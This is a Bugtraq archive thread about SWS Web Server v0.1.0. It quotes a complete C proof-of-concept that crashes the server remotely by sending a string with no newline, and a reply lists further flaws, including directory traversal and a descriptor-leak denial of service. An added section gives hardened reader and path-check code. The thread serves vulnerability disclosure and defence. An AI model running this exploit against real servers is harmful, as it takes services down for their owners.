Bugtraq mailing list archives

Re: SWS Web Server v0.1.0 Exploit


From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Tue, 3 Sep 2002 14:47:22 +0400

Dear saman () hush com,

I don't believe this is the largest problem of this "webserver"... There are
a lot of others:

1. Directory traversal (../) (it never drops the root privileges it needs to
bind to TCP/80).
2. It never closes the file descriptor for the 404 document, so it can be used to
DoS the remote system completely by repeating requests to a nonexistent
document.
3. It allows only 1 connection at a time and never times out.
4. If recv() fails it will overwrite 1 byte before the allocated buffer and
repeat the previous query. If the first recv() fails it will try to do some
action on uninitialized heap data.

One should be completely nuts to use it because there are too many bugs
for 130 lines of code :)

--Monday, September 2, 2002, 10:04:23 PM, you wrote to bugtraq () securityfocus org:



shc> /*
shc>  * Mon Sep  2 17:45:04 2002
shc>  *
shc>  * |SaMaN| aka Mert <saman () hush com>
shc>  *
shc>  * Information  : Anyone can kill SWS Web Server v0.1.0 remotely.
shc>  *
shc>  * Proof of Concept Exploit for SWS Web Server v0.1.0
shc>  *
shc>  * SWS homepage : http://www.linuxprogramlama.com
shc>  *
shc>  * Tested on    : Slackware 8.1 - 2.4.18
shc>  *              : Redhat 7.0    - 2.2.16-22
shc>  *
shc>  * Problem      : sws_web_server.c
shc>  *              : line 108
shc>  *              : if (recvBuffer[i - 1] != '\n') break;
shc>  *
shc>  * Q : So what will happen when we send a string not ending with '\n' ?
shc>  * A : break break break
shc>  * Q : So root should restart the web server every time ?
shc>  * A : Yes
shc>  * Q : Other web servers act like this ?
shc>  * A : No
shc>  * Q : So something is wrong ?
shc>  * A : Yes :)
shc>  *
shc> */

shc> #include <stdio.h>
shc> #include <stdlib.h>
shc> #include <unistd.h>
shc> #include <errno.h>
shc> #include <string.h>
shc> #include <netdb.h>
shc> #include <sys/types.h>
shc> #include <netinet/in.h>
shc> #include <sys/socket.h>

shc> #define K  "\033[1;31m"
shc> #define Y  "\033[1;32m"
shc> #define SA "\033[1;33m"
shc> #define M  "\033[1;34m"

shc> #define PORT 80

shc> int main(int argc, char *argv[])
shc> {
shc>    int sockfd, numbytes;
shc>    struct hostent *adres;
shc>    struct sockaddr_in hedef;

shc>    char buf[8] = "|SaMaN|";

shc>    if (argc != 2) {
shc>       printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K);
shc>       printf("%sSWS Web Killer (saman () hush com)  \n", SA);
shc>       printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K);
shc>       printf("%sUsage: ./sws_web_killer %s<IP>   \n",Y,M);
shc>       return 0;
shc>    }

shc>    if ((adres=gethostbyname(argv[1])) == NULL) {
shc>       perror("gethostbyname");
shc>       exit(1);
shc>    }

shc>    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
shc>       perror("socket");
shc>       exit(1);
shc>    }

shc>    hedef.sin_family = AF_INET;
shc>    hedef.sin_port = htons(PORT);
shc>    hedef.sin_addr = *((struct in_addr *)adres->h_addr);
shc>    memset(&(hedef.sin_zero), '\0', 8);

shc>    if (connect(sockfd, (struct sockaddr *)&hedef,
shc>                                      sizeof(struct sockaddr)) == -1)
shc>    {
shc>         perror("connect");
shc>         exit(1);
shc>    }

shc>    if ((numbytes=send(sockfd, buf, strlen(buf), 0)) == -1) {
shc>         perror("send");
shc>         exit(1);
shc>    }

shc>    close(sockfd);

shc>    return 0;
shc> }




-- 
~/ZARAZA
Thus this route is cheaper and easier to reach for anyone
who is able to reach it. (Twain)
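As an added example that is not part of either post, the code below shows how the request-reading loop the PoC targets (line 108 of sws_web_server.c and the recv() handling in 3APA3A's item 4) and the path handling in item 1 can be written defensively. The function names, the 2 s timeout and the socketpair harness are my own constructions, not SWS code.

```c
#include <errno.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <unistd.h>
/* Hardened request-line reader (added example, not SWS code). Returns the line
 * length, 0 if the peer closed before sending anything, -1 on error or timeout.
 * It never touches buf[i-1] before a byte arrived, never overruns buf, and a
 * failed recv() ends this request instead of replaying the previous one. */
ssize_t read_request_line(int fd, char *buf, size_t cap, int timeout_sec)
{
    struct timeval tv = { timeout_sec, 0 };
    size_t n = 0;
    setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv); /* no idle hang */
    while (n + 1 < cap) {                       /* keep room for the NUL */
        ssize_t r = recv(fd, buf + n, 1, 0);
        if (r < 0) {
            if (errno == EINTR) continue;
            return -1;                          /* EAGAIN here means timeout */
        }
        if (r == 0) break;                      /* peer closed */
        if (buf[n++] == '\n') break;            /* complete line */
    }
    buf[n] = '\0';
    return (ssize_t)n;
}

/* Reject any ".." path component (item 1); SWS runs as root, so check before open(). */
int path_is_safe(const char *path)
{
    if (*path != '/') return 0;
    for (const char *p = path; *p; ) {
        const char *seg = p;
        while (*p && *p != '/') p++;
        if (p - seg == 2 && seg[0] == '.' && seg[1] == '.') return 0;
        if (*p) p++;
    }
    return 1;
}

/* Constructed harness: send data over a socketpair, close the client side as the PoC does, read one line. */
ssize_t feed_and_read(const char *data, char *out, size_t cap)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0) return -2;
    if (write(sv[1], data, strlen(data)) != (ssize_t)strlen(data)) return -2;
    close(sv[1]);
    ssize_t n = read_request_line(sv[0], out, cap, 2);
    close(sv[0]);
    return n;
}
```

With the PoC payload "|SaMaN|" (no trailing newline) the reader returns the 7 bytes it got and the server can go on to the next connection instead of breaking out of its loop.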